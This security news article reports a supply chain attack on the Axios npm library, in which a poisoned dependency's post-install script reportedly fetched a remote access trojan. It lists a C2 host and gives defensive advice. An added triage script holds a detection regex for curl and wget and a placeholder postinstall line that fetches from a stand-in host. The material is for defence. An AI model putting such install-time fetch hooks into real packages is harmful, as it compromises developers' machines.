Axios Hit by Critical Supply Chain Attack: Malware Injected into 100M-Download Library
Axios, one of the world's most popular HTTP clients with over 100 million weekly downloads, has fallen victim to a supply chain attack. Threat actors injected a Remote Access Trojan (RAT) into versions 1.14.1 and 0.30.4. The malicious releases remained available on npm for approximately two and a half hours before they were detected and removed.
The Mechanism of Attack: Dependency Poisoning
The attackers used a technique often called "dependency poisoning". They first published a malicious npm package named plain-crypto-js, then modified Axios so that the compromised releases declared plain-crypto-js as a dependency. Axios's own files did not need to contain anything that looked malicious; the payload rode in on the new dependency.
Axios normally builds and publishes through GitHub Actions. The compromised versions, however, were published directly from an npm account associated with the email ifstap@proton.me, outside that automated pipeline.
How the Malware Operates
The Axios package itself did not carry the malware, which helped it evade a first look. Instead, a malicious post-install script (a lifecycle hook that npm runs automatically during npm install) fetched the RAT from an external server and installed it on the developer's machine, giving the attackers full remote control over the infected system.
Network Indicators for Organizations:
Malicious C2 Server: sfrclak.com:8000
Recommendation: Security teams should immediately search proxy, DNS and firewall logs for any outbound connection to this host or port, and treat any machine that made one as compromised rather than merely blocking the domain, since the RAT gives the attacker a foothold on that machine. They should also ensure that no project resolves Axios to 1.14.1 or 0.30.4, moving affected builds to a verified safe release.
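The checks described in the two sections above (the install-time script that pulls the RAT, and the network and package indicators) can be run offline over artefacts a responder already has: a lockfile, the package.json manifests under node_modules, and egress logs. The following is an added example written for this page, not code from StepSecurity or the Axios project. The lockfile, manifests and log lines are constructed for the demo; the plain-crypto-js version number and the postinstall command shown are placeholders, not the real payload.

```javascript
// Added example: offline triage for the Axios/plain-crypto-js indicators.
// Inputs (lockfile, manifests, log lines) are constructed sample data.

const AFFECTED_VERSIONS = { axios: ["1.14.1", "0.30.4"] };
const POISONED_DEPENDENCY = "plain-crypto-js";
const C2_HOST = /\bsfrclak\.com(?::8000)?\b/i;
const INSTALL_HOOKS = ["preinstall", "install", "postinstall"];

// Package name from a lockfile "packages" key, e.g.
// "node_modules/foo/node_modules/@scope/bar" -> "@scope/bar".
function nameFromPath(path) {
  const i = path.lastIndexOf("node_modules/");
  return i === -1 ? path : path.slice(i + "node_modules/".length);
}

// 1. Walk a lockfileVersion 2/3 "packages" map and report known-bad entries.
function findAffectedPackages(lock) {
  const findings = [];
  for (const [path, meta] of Object.entries(lock.packages || {})) {
    if (path === "") continue; // the root project itself
    const name = nameFromPath(path);
    if (name === POISONED_DEPENDENCY) {
      findings.push({ path, name, version: meta.version, reason: "poisoned dependency" });
    } else if ((AFFECTED_VERSIONS[name] || []).includes(meta.version)) {
      findings.push({ path, name, version: meta.version, reason: "compromised release" });
    }
  }
  return findings;
}

// 2. Flag manifests that run code at install time. A network fetch inside such
// a hook is the pattern described above, so it is marked separately.
function findInstallScripts(manifests) {
  const out = [];
  for (const m of manifests) {
    for (const hook of INSTALL_HOOKS) {
      const cmd = m.scripts && m.scripts[hook];
      if (!cmd) continue;
      const fetchesRemote = /\b(curl|wget|https?:\/\/|fetch\()/i.test(cmd);
      out.push({ name: m.name, hook, cmd, fetchesRemote });
    }
  }
  return out;
}

// 3. Keep only log lines that mention the C2 host.
function findC2Hits(lines) {
  return lines.filter((l) => C2_HOST.test(l));
}

// --- constructed sample data -----------------------------------------------
const sampleLock = {
  lockfileVersion: 3,
  packages: {
    "": { dependencies: { axios: "^1.14.0" } },
    "node_modules/axios": { version: "1.14.1" },
    "node_modules/plain-crypto-js": { version: "0.0.1" }, // version is made up
    "node_modules/follow-redirects": { version: "1.15.9" },
  },
};
const sampleManifests = [
  { name: "follow-redirects", scripts: { test: "mocha" } },
  // placeholder command, not the real payload
  { name: "plain-crypto-js", scripts: { postinstall: "node -e \"fetch('http://example.invalid/x')\"" } },
  { name: "some-native-addon", scripts: { postinstall: "node install.js" } },
];
const sampleLog = [
  "10:02:11 CONNECT registry.npmjs.org:443 src=10.0.4.21",
  "10:02:14 CONNECT sfrclak.com:8000 src=10.0.4.21",
  "10:03:02 CONNECT github.com:443 src=10.0.4.22",
];

function triage(lock, manifests, log) {
  return {
    packages: findAffectedPackages(lock),
    installScripts: findInstallScripts(manifests),
    c2: findC2Hits(log),
  };
}

console.log(JSON.stringify(triage(sampleLock, sampleManifests, sampleLog), null, 2));
```

On a real system, feed the script the parsed package-lock.json, the package.json of every directory under node_modules, and the relevant log export. A hit in the log check means the host ran the post-install payload and should be investigated as compromised; the lockfile check only tells you whether the poisoned release was ever resolved.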
Although the malicious versions were live for only about 2.5 hours, 100 million downloads per week works out to roughly ten thousand downloads every minute, and any CI/CD pipeline that resolved Axios from a floating version range during that window could have pulled the poisoned release automatically. This is why supply chain attacks are among the most dangerous.
Widely used libraries increasingly publish through OIDC (OpenID Connect) trusted publishing, where the registry authorizes a release with a short-lived token issued to the project's own GitHub Actions workflow rather than a long-lived token on a human account, and attaches a provenance attestation to the release. The fact that a release could be pushed from an account tied to a personal ProtonMail address shows that a human credential still had publish rights alongside the automated path, a gap in the project's access control. Developers should check a package's provenance attestation (for example with npm audit signatures) before trusting a new version.
Experts recommend pinning exact versions and committing a lockfile (package-lock.json or yarn.lock), which records the resolved version and an integrity hash for every package, so that a build cannot silently pick up a new release without a human reviewing the change. Subresource Integrity (SRI) plays the same role for the browser case, where a script loaded from a CDN is checked against a hash in the script tag.
Tools such as Socket.dev or Snyk are also recommended; they alert when a package's maintainers change or when a new version adds suspicious dependencies.
Source: StepSecurity